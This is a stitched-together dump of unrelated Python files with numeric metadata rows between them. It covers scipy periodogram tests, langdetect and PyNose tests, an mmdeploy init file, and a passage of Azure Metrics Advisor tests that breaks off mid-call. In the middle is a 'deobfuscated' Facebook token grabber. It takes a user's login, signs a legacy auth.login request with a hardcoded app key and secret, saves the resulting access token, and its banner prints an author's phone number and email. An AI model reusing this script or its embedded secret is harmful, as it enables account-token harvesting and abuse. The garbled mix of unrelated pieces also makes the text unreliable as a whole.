# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
P = lombscargle(t, x, f)
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
delta = f[1] - f[0]
assert_(w - f[np.argmax(P)] < (delta/2.))
def test_amplitude(self):
"""Test if height of peak in normalized Lomb-Scargle periodogram
corresponds to amplitude of the generated input signal.
"""
# Input parameters
ampl = 2.
w = 1.
phi = 0.5 * np.pi
nin = 100
nout = 1000
p = 0.7 # Fraction of points to select
# Randomly select a fraction of an array with timesteps
np.random.seed(2353425)
r = np.random.rand(nin)
t = np.linspace(0.01*np.pi, 10.*np.pi, nin)[r >= p]
# Plot a sine wave for the selected times
x = ampl * np.sin(w*t + phi)
# Define the array of frequencies for which to compute the periodogram
f = np.linspace(0.01, 10., nout)
# Calculate Lomb-Scargle periodogram
pgram = lombscargle(t, x, f)
# Normalize
pgram = np.sqrt(4 * pgram / t.shape[0])
# Check if difference between found frequency maximum and input
# frequency is less than accuracy
assert_approx_equal(np.max(pgram), ampl, significant=2)
def test_wrong_shape(self):
t = np.linspace(0, 1, 1)
x = np.linspace(0, 1, 2)
f = np.linspace(0, 1, 3)
assert_raises(ValueError, lombscargle, t, x, f)
def test_zero_division(self):
t = np.zeros(1)
x = np.zeros(1)
f = np.zeros(1)
assert_raises(ZeroDivisionError, lombscargle, t, x, f)
def test_lombscargle_atan_vs_atan2(self):
# https://github.com/scipy/scipy/issues/3787
# This raised a ZeroDivisionError.
t = np.linspace(0, 10, 1000, endpoint=False)
x = np.sin(4*t)
f = np.linspace(0, 50, 500, endpoint=False) + 0.1
q = lombscargle(t, x, f*2*np.pi)
if __name__ == "__main__":
run_module_suite()
| 34.210526
| 79
| 0.539968
| 4,842
| 31,200
| 3.359769
| 0.059686
| 0.105852
| 0.02969
| 0.038358
| 0.896914
| 0.88585
| 0.878903
| 0.870113
| 0.857819
| 0.850566
| 0
| 0.134174
| 0.306058
| 31,200
| 911
| 80
| 34.248079
| 0.6172
| 0.031667
| 0
| 0.80343
| 0
| 0
| 0.007463
| 0
| 0
| 0
| 0
| 0
| 0.261214
| 1
| 0.117414
| false
| 0
| 0.009235
| 0
| 0.134565
| 0.001319
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
588d033cd648dd40b9af5f385c2cc4e5591df484
| 5,793
|
py
|
Python
|
CNK-GToken/cnk-gtoken_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
CNK-GToken/cnk-gtoken_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
CNK-GToken/cnk-gtoken_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Deobfuscated BY HTR-TECH | Tahmid Rayat
# Github : https://github.com/htr-tech
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook : https://fb.com/tahmid.rayat.oficial
# Messenger : https://m.me/tahmid.rayat.oficial
import os, json, base64, hashlib, random, time, sys
from requests import get, post
P = '\x1b[0m'
H = '\x1b[031m'
G = '\x1b[032m'
K = '\x1b[0;33m'
L = P + '=' * 56
V = ('{}[{}+{}]{} ').format(G, P, G, P)
print "\x1b[30;1m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\xe2\x95\x91\x1b[31;1m ____ _ _ _ __ ____ _____ _ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[31;1m / ___| \\ | | |/ / / ___|_ _|__ | | _____ _ __ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[31;1m| | | \\| | ' /_____| | _ | |/ _ \\| |/ / _ \\ '_ \\ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[0;37m| |___| |\\ | . \\_____| |_| | | | (_) | < __/ | | |\x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[0;37m \\____|_| \\_|_|\\_\\ \\____| |_|\\___/|_|\\_\\___|_| |_|\x1b[30;1m\xe2\x95\x91\n\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\xa3\x1b[30;1m\n\xe2\x95\x91\x1b[31;1m\xe2\x9e\xa2 Author : Febry [ xNot_Found ] \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[32;1m\xe2\x9e\xa3 Contact: +62823-8637-2115 \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[33;1m\xe2\x9e\xa2 Email : febryafriansyah@programmer.net \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[34;1m\xe2\x9e\xa3 Website: http://hatakecnk.noads.biz \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[37;1m\xe2\x9e\xa2 Github : https://github.com/hatakecnk \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d"
try:
ID = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Input Your Username \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
PW = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Input Your Password \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
API_SECRET = '62f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': ID, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': PW, 'return_ssl_resources': '0', 'v': '1.0'}
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + ID + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + PW + 'return_ssl_resources=0v=1.0' + API_SECRET
x = hashlib.new('md5')
x.update(sig)
data.update({'sig': x.hexdigest()})
def Token():
R = json.loads(get('https://api.facebook.com/restserver.php', params=data).text)
try:
T = R['access_token']
Token = open('token.txt', 'wb')
Token.write(T)
print V + 'Token has been saved as token.txt'
a = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Show Acces Token (y/n) \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
if a == 'y':
print '\n' + L + '\n\x1b[35;1m' + T + '\n' + L
else:
sys.exit()
except:
print H + '\n[!]' + P + ' Failed'
except IndexError:
print '\n\x1b[31;1m[\x1b[0;37m!\x1b[31;1m] \x1b[0;37mthere is an error'
sys.exit()
except KeyboardInterrupt:
print '\n\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m ctrl+c detected'
print '\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m trying to exit'
time.sleep(3)
sys.exit()
except EOFError:
print '\n\n\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m ctrl+d detected'
print '\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m trying to exit'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
try:
Token()
except ImportError:
exit()
| 93.435484
| 3,118
| 0.650268
| 1,101
| 5,793
| 3.317893
| 0.158946
| 0.308787
| 0.399124
| 0.532165
| 0.636189
| 0.630441
| 0.630441
| 0.621133
| 0.621133
| 0.614837
| 0
| 0.265918
| 0.124288
| 5,793
| 61
| 3,119
| 94.967213
| 0.454169
| 0.039013
| 0
| 0.22
| 0
| 0.14
| 0.794065
| 0.615468
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.06
| 0.06
| null | null | 0.18
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
54755487584149a3e622cefc821b0f8ef2e2ac42
| 1,679
|
py
|
Python
|
langdetect/tests/utils/test_unicode_block.py
|
mrhaanraadts/langdetect
|
edc668bc019719ed1e5718ad59bf339180de09e1
|
[
"Apache-2.0"
] | 1,269
|
2015-01-05T13:51:00.000Z
|
2022-03-28T03:07:31.000Z
|
langdetect/tests/utils/test_unicode_block.py
|
HelenaSak/langdetect
|
c4b28fe44370863eb6e2f73cfe0cfae5d5a895da
|
[
"Apache-2.0"
] | 75
|
2015-02-16T15:52:41.000Z
|
2022-02-19T10:17:26.000Z
|
langdetect/tests/utils/test_unicode_block.py
|
HelenaSak/langdetect
|
c4b28fe44370863eb6e2f73cfe0cfae5d5a895da
|
[
"Apache-2.0"
] | 205
|
2015-01-01T18:33:32.000Z
|
2022-03-31T22:52:32.000Z
|
import unittest
import six
from langdetect.utils import unicode_block
class UnicodeBlockTest(unittest.TestCase):
def test_unicode_block(self):
self.assertEqual(unicode_block.unicode_block(six.u('\u0065')), unicode_block.UNICODE_BASIC_LATIN)
self.assertEqual(unicode_block.unicode_block(six.u('\u007F')), unicode_block.UNICODE_BASIC_LATIN)
self.assertEqual(unicode_block.unicode_block(six.u('\u0080')), unicode_block.UNICODE_LATIN_1_SUPPLEMENT)
self.assertEqual(unicode_block.unicode_block(six.u('\u21FF')), unicode_block.UNICODE_ARROWS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2200')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2201')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u22FF')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2300')), unicode_block.UNICODE_MISCELLANEOUS_TECHNICAL)
# test only on wide builds (i.e. Python 3)
if len(six.u('\U0010FFFF')) == 1:
self.assertEqual(unicode_block.unicode_block(six.u('\U000F0000')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_A)
self.assertEqual(unicode_block.unicode_block(six.u('\U000FFFFF')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_A)
self.assertEqual(unicode_block.unicode_block(six.u('\U00100000')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_B)
self.assertEqual(unicode_block.unicode_block(six.u('\U0010FFFF')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_B)
| 69.958333
| 134
| 0.775462
| 214
| 1,679
| 5.733645
| 0.247664
| 0.371638
| 0.371638
| 0.264059
| 0.718826
| 0.718826
| 0.718826
| 0.718826
| 0.466993
| 0.466993
| 0
| 0.037483
| 0.110185
| 1,679
| 23
| 135
| 73
| 0.783802
| 0.023824
| 0
| 0
| 0
| 0
| 0.059866
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54899422f1f04a9b95ecbcfe68e47f0d379f21dd
| 672
|
py
|
Python
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
WANGJIEKE/pycharm_test_smell_plugin
|
081e5f9dcc416da4a290bcc5102ce46f104afefa
|
[
"Apache-2.0"
] | 33
|
2021-08-05T04:54:25.000Z
|
2022-03-21T18:44:55.000Z
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
WANGJIEKE/pycharm_test_smell_plugin
|
081e5f9dcc416da4a290bcc5102ce46f104afefa
|
[
"Apache-2.0"
] | 19
|
2021-09-10T08:22:24.000Z
|
2022-02-15T09:26:57.000Z
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
JetBrains-Research/PyNose
|
43690aa7fc4a964db39b165ea9fefcc8a7c0b420
|
[
"Apache-2.0"
] | null | null | null |
import unittest
class SomeClass(unittest.TestCase):
def <weak_warning descr="You can use the setUp() method to create the test fixture, instead of initializing the constructor">__init__</weak_warning>(self):
super().__init__()
def test_something(self):
pass
class OtherClass(unittest.TestCase):
def <weak_warning descr="You can use the setUp() method to create the test fixture, instead of initializing the constructor">__init__</weak_warning>(self):
super().__init__()
def test_something_other(self):
pass
class AnotherClass:
def __init__(self):
pass
def test_something_else(self):
pass
| 23.172414
| 159
| 0.700893
| 85
| 672
| 5.2
| 0.376471
| 0.099548
| 0.108597
| 0.104072
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0
| 0
| 0.21131
| 672
| 28
| 160
| 24
| 0.833962
| 0
| 0
| 0.5
| 0
| 0
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.25
| 0.0625
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
54ac8a1a3fc4100168778c3e4d41011e136fe3c3
| 137
|
py
|
Python
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 746
|
2021-12-27T10:50:28.000Z
|
2022-03-31T13:34:14.000Z
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 253
|
2021-12-28T05:59:13.000Z
|
2022-03-31T18:22:25.000Z
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 147
|
2021-12-27T10:50:33.000Z
|
2022-03-30T10:44:20.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .optimizers import * # noqa: F401,F403
from .rewriters import * # noqa: F401,F403
| 34.25
| 47
| 0.722628
| 18
| 137
| 5.5
| 0.722222
| 0.20202
| 0.282828
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 0.167883
| 137
| 3
| 48
| 45.666667
| 0.763158
| 0.562044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54b7eaf9936ec14bc1b95b09bcbcc560f20cf000
| 54,314
|
py
|
Python
|
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import datetime
import uuid
from dateutil.tz import tzutc
import pytest
import functools
from azure.core.exceptions import ResourceNotFoundError
from azure.ai.metricsadvisor.models import (
SqlServerDataFeedSource,
AzureTableDataFeedSource,
AzureBlobDataFeedSource,
AzureCosmosDbDataFeedSource,
DataFeedMetric,
DataFeedDimension,
DataFeedSchema,
DataFeedIngestionSettings,
DataFeedGranularity,
DataFeedMissingDataPointFillSettings,
DataFeedRollupSettings,
AzureApplicationInsightsDataFeedSource,
AzureDataExplorerDataFeedSource,
InfluxDbDataFeedSource,
AzureDataLakeStorageGen2DataFeedSource,
MongoDbDataFeedSource,
MySqlDataFeedSource,
PostgreSqlDataFeedSource,
)
from devtools_testutils import AzureRecordedTestCase
from devtools_testutils.aio import recorded_by_proxy_async
from azure.ai.metricsadvisor.aio import MetricsAdvisorAdministrationClient
from base_testcase_async import TestMetricsAdvisorClientBase, MetricsAdvisorClientPreparer, CREDENTIALS, ids
MetricsAdvisorPreparer = functools.partial(MetricsAdvisorClientPreparer, MetricsAdvisorAdministrationClient)
class TestMetricsAdvisorAdministrationClient(TestMetricsAdvisorClientBase):
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_simple_data_feed(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query="select * from adsample2 where Timestamp = @StartTime"
),
granularity="Daily",
schema=["cost", "revenue"],
ingestion_settings=datetime.datetime(2019, 10, 1)
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Daily"
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_from_sql_server(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admins=["yournamehere@microsoft.com"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="SmartFilling"
),
rollup_settings=DataFeedRollupSettings(
rollup_type="NoRollup",
rollup_method="None",
),
viewers=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Daily"
assert data_feed.granularity.custom_granularity_value is None
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.schema.metrics[0].display_name == "display cost"
assert data_feed.schema.metrics[1].display_name == "display revenue"
assert data_feed.schema.metrics[0].description == "the cost"
assert data_feed.schema.metrics[1].description == "the revenue"
assert data_feed.schema.dimensions[0].name == "category"
assert data_feed.schema.dimensions[1].name == "city"
assert data_feed.schema.dimensions[0].display_name == "display category"
assert data_feed.schema.dimensions[1].display_name == "display city"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert data_feed.ingestion_settings.data_source_request_concurrency == 0
assert data_feed.ingestion_settings.ingestion_retry_delay == -1
assert data_feed.ingestion_settings.ingestion_start_offset == -1
assert data_feed.ingestion_settings.stop_retry_after == -1
assert "yournamehere@microsoft.com" in data_feed.admins
assert data_feed.data_feed_description == "my first data feed"
assert data_feed.missing_data_point_fill_settings.fill_type == "SmartFilling"
assert data_feed.rollup_settings.rollup_type == "NoRollup"
assert data_feed.rollup_settings.rollup_method == "None"
assert data_feed.viewers == ["viewers"]
assert data_feed.access_mode == "Private"
assert data_feed.action_link_template == "action link template"
assert data_feed.status == "Active"
assert data_feed.is_admin
assert data_feed.metric_ids is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
with pytest.raises(ResourceNotFoundError):
await client.get_data_feed(variables["data_feed_id"])
return variables
@pytest.mark.skip("skip test")
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_from_sql_server_with_custom_values(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Custom",
custom_granularity_value=400
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admins=["yournamehere@microsoft.com"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="CustomValue",
custom_fill_value=10
),
rollup_settings=DataFeedRollupSettings(
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup"
),
viewers=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Custom"
assert data_feed.granularity.custom_granularity_value == 400
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.schema.metrics[0].display_name == "display cost"
assert data_feed.schema.metrics[1].display_name == "display revenue"
assert data_feed.schema.metrics[0].description == "the cost"
assert data_feed.schema.metrics[1].description == "the revenue"
assert data_feed.schema.dimensions[0].name == "category"
assert data_feed.schema.dimensions[1].name == "city"
assert data_feed.schema.dimensions[0].display_name == "display category"
assert data_feed.schema.dimensions[1].display_name == "display city"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert data_feed.ingestion_settings.data_source_request_concurrency == 0
assert data_feed.ingestion_settings.ingestion_retry_delay == -1
assert data_feed.ingestion_settings.ingestion_start_offset == -1
assert data_feed.ingestion_settings.stop_retry_after == -1
assert "yournamehere@microsoft.com" in data_feed.admins
assert data_feed.data_feed_description == "my first data feed"
assert data_feed.missing_data_point_fill_settings.fill_type == "CustomValue"
assert data_feed.missing_data_point_fill_settings.custom_fill_value == 10
assert data_feed.rollup_settings.rollup_type == "AlreadyRollup"
assert data_feed.rollup_settings.rollup_method == "Sum"
assert data_feed.rollup_settings.rollup_identification_value == "sumrollup"
assert data_feed.viewers == ["viewers"]
assert data_feed.access_mode == "Private"
assert data_feed.action_link_template == "action link template"
assert data_feed.status == "Active"
assert data_feed.is_admin
assert data_feed.metric_ids is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
with pytest.raises(ResourceNotFoundError):
await client.get_data_feed(variables["data_feed_id"])
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_table(self, client, variables):
name = self.create_random_name("tablefeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureTableDataFeedSource(
connection_string="azure_table_connection_string",
query="PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'",
table="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
